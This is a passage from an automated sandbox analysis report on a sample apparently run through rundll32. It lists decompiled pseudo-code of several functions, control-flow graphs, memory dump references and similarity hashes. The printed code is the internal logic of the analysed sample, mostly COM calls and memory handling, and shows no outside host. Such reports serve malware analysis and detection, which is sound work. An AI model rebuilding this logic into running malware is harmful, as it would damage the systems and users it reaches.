• Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp
• Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp
• Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                                                                                                                                    C-Code - Quality: 64%
                                                                                                                                                                                                                                    			E031B7B5D(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                    				intOrPtr _t22;
                                                                                                                                                                                                                                    				void* _t24;
                                                                                                                                                                                                                                    				intOrPtr* _t26;
                                                                                                                                                                                                                                    				intOrPtr* _t28;
                                                                                                                                                                                                                                    				void* _t32;
                                                                                                                                                                                                                                    				intOrPtr* _t33;
                                                                                                                                                                                                                                    				intOrPtr _t36;
                                                                                                                                                                                                                                    				intOrPtr* _t39;
                                                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t22 =  *0x31bd27c; // 0x1faa5a8
                                                                                                                                                                                                                                    				_t2 = _t22 + 0x31be0dc; // 0x5168684
                                                                                                                                                                                                                                    				_t3 = _t22 + 0x31be0cc; // 0x4590f811
                                                                                                                                                                                                                                    				_t39 = 0;
                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                    				_t24 =  *0x31bd15c(_t3, 0, 1, _t2,  &_v16); // executed
                                                                                                                                                                                                                                    				_t46 = _t24;
                                                                                                                                                                                                                                    				if(_t46 >= 0) {
                                                                                                                                                                                                                                    					if(_a8 != 0) {
                                                                                                                                                                                                                                    						_t36 =  *0x31bd27c; // 0x1faa5a8
                                                                                                                                                                                                                                    						_t8 = _t36 + 0x31be3b8; // 0x5f005f
                                                                                                                                                                                                                                    						E031B908B(_t8, _a8,  &_v12);
                                                                                                                                                                                                                                    						_t39 = _v12;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t26 = _v16;
                                                                                                                                                                                                                                    					_t46 =  *((intOrPtr*)( *_t26 + 0xc))(_t26, _a4, 0, 0, 0, 0, 0, _t39,  &_v8);
                                                                                                                                                                                                                                    					if(_t46 >= 0) {
                                                                                                                                                                                                                                    						_t32 =  *0x31bd158(_v8, 0xa, 0, 0, 3, 3, 0, 0); // executed
                                                                                                                                                                                                                                    						_t46 = _t32;
                                                                                                                                                                                                                                    						_t33 = _v8;
                                                                                                                                                                                                                                    						if(_t46 < 0) {
                                                                                                                                                                                                                                    							 *((intOrPtr*)( *_t33 + 8))(_t33);
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							 *_a12 = _t33;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(_t39 != 0) {
                                                                                                                                                                                                                                    						 *((intOrPtr*)( *_t39 + 8))(_t39);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t28 = _v16;
                                                                                                                                                                                                                                    					 *((intOrPtr*)( *_t28 + 8))(_t28);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t46;
                                                                                                                                                                                                                                    			}
















                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 9dc96f86dbbaa20c8ef60299b3bed7d9e93c288ee7591700e430430b411c89c3
                                                                                                                                                                                                                                    • Instruction ID: ae7d01078ecc1e38965d4add754ef48473de8ac4976c522a8f0c3f0462e92108
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9dc96f86dbbaa20c8ef60299b3bed7d9e93c288ee7591700e430430b411c89c3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8214879600218BFCB15DFA4D888DCEBBBDEF8D750B1584A5F906DB240D7319A41CBA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 516 31b83b7-31b8406 518 31b8479-31b847e 516->518 519 31b8408-31b8419 516->519 521 31b841b-31b843b call 31b2049 519->521 522 31b8470 519->522 526 31b843d-31b8447 521->526 527 31b8466 521->527 522->518 529 31b844c-31b844e 526->529 528 31b846f 527->528 528->522 530 31b8460-31b8461 call 31b9039 529->530 531 31b8450-31b845f call 31b5544 529->531 530->527 531->530
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 18b35e47a76f57fff8adf18d76cabefa3de850c179e554b87cc717721a5a27b3
                                                                                                                                                                                                                                    • Instruction ID: aa805fbe065065f7887ae2ea1aa0520121719696c31485770243346962209fd8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 18b35e47a76f57fff8adf18d76cabefa3de850c179e554b87cc717721a5a27b3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6221E5B6A00218FBDB11EF95CC85ADEBFBDEB0CB50F104066F904B6114E7719A459BE0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 535 31b43df-31b43ef call 31b2049 538 31b4495-31b4498 535->538 539 31b43f5-31b440c 535->539 540 31b449d-31b449f 538->540 541 31b4413-31b4418 539->541 542 31b448a-31b4493 call 31b9039 541->542 543 31b441a-31b443d 541->543 542->540 547 31b443f-31b4458 543->547 548 31b447e 543->548 552 31b445a-31b4470 547->552 553 31b4472-31b447c 547->553 549 31b4482-31b4488 548->549 549->542 551 31b449a 549->551 551->540 552->549 553->548
                                                                                                                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                                                                                                                    			E031B43DF(void* __ebx, void* __ecx, void* __edi, signed int _a4) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				void* _t19;
                                                                                                                                                                                                                                    				signed int _t21;
                                                                                                                                                                                                                                    				intOrPtr _t22;
                                                                                                                                                                                                                                    				intOrPtr* _t26;
                                                                                                                                                                                                                                    				signed int _t27;
                                                                                                                                                                                                                                    				intOrPtr* _t28;
                                                                                                                                                                                                                                    				signed int _t29;
                                                                                                                                                                                                                                    				intOrPtr* _t30;
                                                                                                                                                                                                                                    				intOrPtr* _t32;
                                                                                                                                                                                                                                    				intOrPtr* _t35;
                                                                                                                                                                                                                                    				intOrPtr* _t40;
                                                                                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                                                                                    				intOrPtr _t45;
                                                                                                                                                                                                                                    				intOrPtr* _t49;
                                                                                                                                                                                                                                    				intOrPtr* _t51;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t51 = E031B2049(_t19, 0xc);
                                                                                                                                                                                                                                    				if(_t51 == 0) {
                                                                                                                                                                                                                                    					_t21 = 8;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t22 =  *0x31bd27c; // 0x1faa5a8
                                                                                                                                                                                                                                    					_t1 = _t22 + 0x31be058; // 0x5168600
                                                                                                                                                                                                                                    					_t2 = _t22 + 0x31be028; // 0x2df01
                                                                                                                                                                                                                                    					_t24 =  *0x31bd15c(_t2, 0, 4, _t1, _t51); // executed
                                                                                                                                                                                                                                    					_v8 = _t24;
                                                                                                                                                                                                                                    					if(_t24 < 0) {
                                                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                                                    						E031B9039(_t24, _t51);
                                                                                                                                                                                                                                    						_t21 = _v8;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t43 =  *0x31bd27c; // 0x1faa5a8
                                                                                                                                                                                                                                    						_t26 =  *_t51;
                                                                                                                                                                                                                                    						_t4 = _t51 + 4; // 0x4
                                                                                                                                                                                                                                    						_t35 = _t4;
                                                                                                                                                                                                                                    						_t5 = _t43 + 0x31be048; // 0xd30c1661
                                                                                                                                                                                                                                    						_t27 =  *((intOrPtr*)( *_t26))(_t26, _t5, _t35, __edi, __ebx);
                                                                                                                                                                                                                                    						_v8 = _t27;
                                                                                                                                                                                                                                    						_t28 =  *_t51;
                                                                                                                                                                                                                                    						_t40 =  *_t28;
                                                                                                                                                                                                                                    						if(_t27 < 0) {
                                                                                                                                                                                                                                    							L6:
                                                                                                                                                                                                                                    							_t24 =  *((intOrPtr*)(_t40 + 8))(_t28);
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t45 =  *0x31bd27c; // 0x1faa5a8
                                                                                                                                                                                                                                    							_t7 = _t51 + 8; // 0x8
                                                                                                                                                                                                                                    							_t49 = _t7;
                                                                                                                                                                                                                                    							_t8 = _t45 + 0x31be068; // 0x2df05
                                                                                                                                                                                                                                    							_t29 =  *_t40(_t28, _t8, _t49);
                                                                                                                                                                                                                                    							_v8 = _t29;
                                                                                                                                                                                                                                    							if(_t29 < 0) {
                                                                                                                                                                                                                                    								_t30 =  *_t35;
                                                                                                                                                                                                                                    								 *((intOrPtr*)( *_t30 + 8))(_t30);
                                                                                                                                                                                                                                    								_t28 =  *_t51;
                                                                                                                                                                                                                                    								_t40 =  *_t28;
                                                                                                                                                                                                                                    								goto L6;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t32 =  *_t49;
                                                                                                                                                                                                                                    								 *((intOrPtr*)( *_t32 + 0xa4))(_t32, 0);
                                                                                                                                                                                                                                    								_t24 = _a4;
                                                                                                                                                                                                                                    								_a4 = _a4 & 0x00000000;
                                                                                                                                                                                                                                    								 *_a4 = _t51;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						if(_v8 >= 0) {
                                                                                                                                                                                                                                    							_t21 = _a4;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							goto L8;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t21;
                                                                                                                                                                                                                                    			}




















                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: f255b6a658bf3b59b73ef1e3fb1640216cee8d7a3babc70b6c6bfb1b488cce1b
                                                                                                                                                                                                                                    • Instruction ID: 588eb183230708dfc400085bf4f4208621069f5624248316dfbf5798b9b2167f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f255b6a658bf3b59b73ef1e3fb1640216cee8d7a3babc70b6c6bfb1b488cce1b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D2137B9600204EFD714DFA5D888F9AB3B9FF8D704F208598E645CB251DB71EA45CBA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                    			E031B8504(void* __eax, void* __ecx, char _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				intOrPtr _t18;
                                                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                                                    				void* _t28;
                                                                                                                                                                                                                                    				void* _t35;
                                                                                                                                                                                                                                    				char _t38;
                                                                                                                                                                                                                                    				intOrPtr _t40;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                                    				_t40 =  *0x31bd340; // 0x5168d39
                                                                                                                                                                                                                                    				_push(0x800);
                                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                                    				_push( *0x31bd238);
                                                                                                                                                                                                                                    				if( *0x31bd24c >= 5) {
                                                                                                                                                                                                                                    					__imp__();
                                                                                                                                                                                                                                    					if(__eax == 0) {
                                                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                                                    						_t28 = 8;
                                                                                                                                                                                                                                    						L7:
                                                                                                                                                                                                                                    						if(_t28 != 0) {
                                                                                                                                                                                                                                    							L10:
                                                                                                                                                                                                                                    							 *0x31bd24c =  *0x31bd24c + 1;
                                                                                                                                                                                                                                    							L11:
                                                                                                                                                                                                                                    							return _t28;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t42 = _a4;
                                                                                                                                                                                                                                    						_t38 = _v8;
                                                                                                                                                                                                                                    						 *_a16 = _a4;
                                                                                                                                                                                                                                    						 *_a20 = E031B2496(_a4, _t38); // executed
                                                                                                                                                                                                                                    						_t18 = E031BA66E(_t35, _t38, _t42); // executed
                                                                                                                                                                                                                                    						if(_t18 != 0) {
                                                                                                                                                                                                                                    							 *_a8 = _t38;
                                                                                                                                                                                                                                    							 *_a12 = _t18;
                                                                                                                                                                                                                                    							if( *0x31bd24c < 5) {
                                                                                                                                                                                                                                    								 *0x31bd24c =  *0x31bd24c & 0x00000000;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							goto L11;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t28 = 0xbf;
                                                                                                                                                                                                                                    						E031BA1B0();
                                                                                                                                                                                                                                    						__imp__( *0x31bd238, 0, _t38); // executed
                                                                                                                                                                                                                                    						goto L10;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t23 = E031BA279(_a4, __ecx, _t35, _t40,  &_v8,  &_a4, __eax);
                                                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                                                    					_t28 = _t23;
                                                                                                                                                                                                                                    					goto L7;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				__imp__(); // executed
                                                                                                                                                                                                                                    				if(__eax == 0) {
                                                                                                                                                                                                                                    					goto L6;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t23 = E031B8B94(_a4, __ecx, _t35, _t40,  &_v8,  &_a4, __eax); // executed
                                                                                                                                                                                                                                    				goto L5;
                                                                                                                                                                                                                                    			}












                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
• Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp
• Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp
• Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp
• Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 29eed12872a73471c228b9cbf3e65d54f113933e34bcc9f04e5de255b59ba01f
                                                                                                                                                                                                                                    • Instruction ID: eccda63066740bcc4866be82f1c52bb67e0f97aa8f5439959a2d4f9debe9f480
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 29eed12872a73471c228b9cbf3e65d54f113933e34bcc9f04e5de255b59ba01f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7421097A600244AFDB19EF59E884ADA77BCEF4D754F044066F9019B240EB70EA858BB1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 556 31b1a70-31b1a84 557 31b1a89-31b1a8e 556->557 558 31b1b25-31b1b2c 557->558 559 31b1a94-31b1a97 557->559 560 31b1a99-31b1aae 559->560 561 31b1ab1-31b1ab4 559->561 560->561 561->558 562 31b1ab6-31b1abb 561->562 564 31b1b18-31b1b23 562->564 565 31b1abd-31b1acf 562->565 564->558 568 31b1b0f-31b1b14 565->568 569 31b1ad1-31b1ade 565->569 568->564 569->568 571 31b1ae0-31b1aee call 31b2049 569->571 574 31b1aff 571->574 575 31b1af0-31b1afd call 31b5544 571->575 577 31b1b06 574->577 575->577 577->568
                                                                                                                                                                                                                                    C-Code - Quality: 35%
                                                                                                                                                                                                                                    			E031B1A70(intOrPtr* __eax, intOrPtr* _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                    				intOrPtr _t26;
                                                                                                                                                                                                                                    				intOrPtr* _t28;
                                                                                                                                                                                                                                    				intOrPtr _t31;
                                                                                                                                                                                                                                    				intOrPtr* _t32;
                                                                                                                                                                                                                                    				intOrPtr _t37;
                                                                                                                                                                                                                                    				intOrPtr _t44;
                                                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_push( &_v12);
                                                                                                                                                                                                                                    				_push(__eax);
                                                                                                                                                                                                                                    				_t37 = 0;
                                                                                                                                                                                                                                    				_t44 = 0; // executed
                                                                                                                                                                                                                                    				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                                                                                                                                                                                                                    				_v8 = _t26;
                                                                                                                                                                                                                                    				if(_t26 < 0) {
                                                                                                                                                                                                                                    					L13:
                                                                                                                                                                                                                                    					return _v8;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(_v12 == 0) {
                                                                                                                                                                                                                                    					__imp__(0xc8);
                                                                                                                                                                                                                                    					_push( &_v12);
                                                                                                                                                                                                                                    					_push(__eax);
                                                                                                                                                                                                                                    					_v8 =  *((intOrPtr*)( *__eax + 0x24))();
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(_v8 >= _t37) {
                                                                                                                                                                                                                                    					_t28 = _v12;
                                                                                                                                                                                                                                    					if(_t28 != 0) {
                                                                                                                                                                                                                                    						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                                                                                                                                                                                                                    						_v8 = _t31;
                                                                                                                                                                                                                                    						if(_t31 >= 0) {
                                                                                                                                                                                                                                    							__imp__(_v16);
                                                                                                                                                                                                                                    							_t44 = _t31;
                                                                                                                                                                                                                                    							if(_t44 != 0) {
                                                                                                                                                                                                                                    								_t44 = _t44 + 1;
                                                                                                                                                                                                                                    								_t46 = _t44 + _t44;
                                                                                                                                                                                                                                    								_t37 = E031B2049(_t31, _t46);
                                                                                                                                                                                                                                    								if(_t37 == 0) {
                                                                                                                                                                                                                                    									_v8 = 0x8007000e;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									_push(_t46);
                                                                                                                                                                                                                                    									_push(_v16);
                                                                                                                                                                                                                                    									_push(_t37);
                                                                                                                                                                                                                                    									L031B5544();
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								__imp__#6(_v16);
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t32 = _v12;
                                                                                                                                                                                                                                    						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					 *_a4 = _t37;
                                                                                                                                                                                                                                    					 *_a8 = _t44 + _t44;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				goto L13;
                                                                                                                                                                                                                                    			}














                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
• Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp
• Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp
• Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp
• Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 72df179ae56ec8c1aa5228294541ad67d977c0796a1139091e6dcc857e8f2773
                                                                                                                                                                                                                                    • Instruction ID: d63df26f121fbd245c79e84ff334c5d8ea555f6366b7f3e0c3e4104bcfea5de7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 72df179ae56ec8c1aa5228294541ad67d977c0796a1139091e6dcc857e8f2773
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1212C79A00209FFCB10DFA8D998DDEBBB9FF4D311B1541A9E905E7214E7309A45CB60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e8fc08b9c7b22cef3ada1414bf898ba12e9bc8dae07196c667b3c769bff892d0
                                                                                                                                                                                                                                    • Instruction ID: 0efd7f5938b930c99b0914738769aa24f74f3fdc73e3c4f65c8bb9be86cacb89
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e8fc08b9c7b22cef3ada1414bf898ba12e9bc8dae07196c667b3c769bff892d0
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2213D7590025DFFEB05EFA4DC84EEEBB79EB4C304F0400A5EA10A61A1D7719A45EF60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 5776fc433a87395c661ff5b2235371ffcbf0f90c7a1ffefd94c91a3e136133eb
                                                                                                                                                                                                                                    • Instruction ID: 74c55faab1711741283c3934b072b23dd44ecbd44e1be9456583af572409bddc
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5776fc433a87395c661ff5b2235371ffcbf0f90c7a1ffefd94c91a3e136133eb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B21C07A600204BBC729EBA8DD05FDA77BDAF8C750F264161F605EB280E77099418BA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                    			E031B3D0D(intOrPtr* _a4, void* _a8) {
                                                                                                                                                                                                                                    				void _v31;
                                                                                                                                                                                                                                    				char _v32;
                                                                                                                                                                                                                                    				void* _t17;
                                                                                                                                                                                                                                    				void* _t19;
                                                                                                                                                                                                                                    				intOrPtr _t21;
                                                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                                                    				signed int _t25;
                                                                                                                                                                                                                                    				signed int _t26;
                                                                                                                                                                                                                                    				intOrPtr _t31;
                                                                                                                                                                                                                                    				void* _t32;
                                                                                                                                                                                                                                    				intOrPtr _t40;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t25 = 6;
                                                                                                                                                                                                                                    				_v32 = 0;
                                                                                                                                                                                                                                    				memset( &_v31, 0, _t25 << 2);
                                                                                                                                                                                                                                    				_t26 = 0;
                                                                                                                                                                                                                                    				asm("stosw");
                                                                                                                                                                                                                                    				asm("stosb");
                                                                                                                                                                                                                                    				_t31 = 0; // executed
                                                                                                                                                                                                                                    				_t17 = E031B83B7( *0x31bd258,  &_v32); // executed
                                                                                                                                                                                                                                    				if(_t17 != 0 && _v31 > 2) {
                                                                                                                                                                                                                                    					_t23 = (_v31 & 0x000000ff) + 0xfffffffe;
                                                                                                                                                                                                                                    					_t26 = 0;
                                                                                                                                                                                                                                    					if(_t23 > 0) {
                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                    							_t31 = _t31 +  *((intOrPtr*)(_t32 + _t26 * 4 - 0x10));
                                                                                                                                                                                                                                    							_t26 = _t26 + 1;
                                                                                                                                                                                                                                    						} while (_t26 < _t23);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t39 = _t31;
                                                                                                                                                                                                                                    				 *0x31bd270 = _t31;
                                                                                                                                                                                                                                    				if(_t31 != 0) {
                                                                                                                                                                                                                                    					L8:
                                                                                                                                                                                                                                    					_t19 = E031B924F( &_a8); // executed
                                                                                                                                                                                                                                    					__eflags = _t19;
                                                                                                                                                                                                                                    					if(_t19 == 0) {
                                                                                                                                                                                                                                    						__eflags = _a8 - 0x1000;
                                                                                                                                                                                                                                    						if(_a8 == 0x1000) {
                                                                                                                                                                                                                                    							goto L10;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t21 = E031B7923(_t26, _t39);
                                                                                                                                                                                                                                    					_t40 =  *0x31bd270; // 0xd448b889
                                                                                                                                                                                                                                    					 *_a8 = _t21;
                                                                                                                                                                                                                                    					if(_t40 != 0) {
                                                                                                                                                                                                                                    						goto L8;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						if(_t21 == 0) {
                                                                                                                                                                                                                                    							L10:
                                                                                                                                                                                                                                    							_push(5);
                                                                                                                                                                                                                                    							_pop(0);
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							 *_a4 = 1;
                                                                                                                                                                                                                                    							 *0x31bd270 = _t21;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
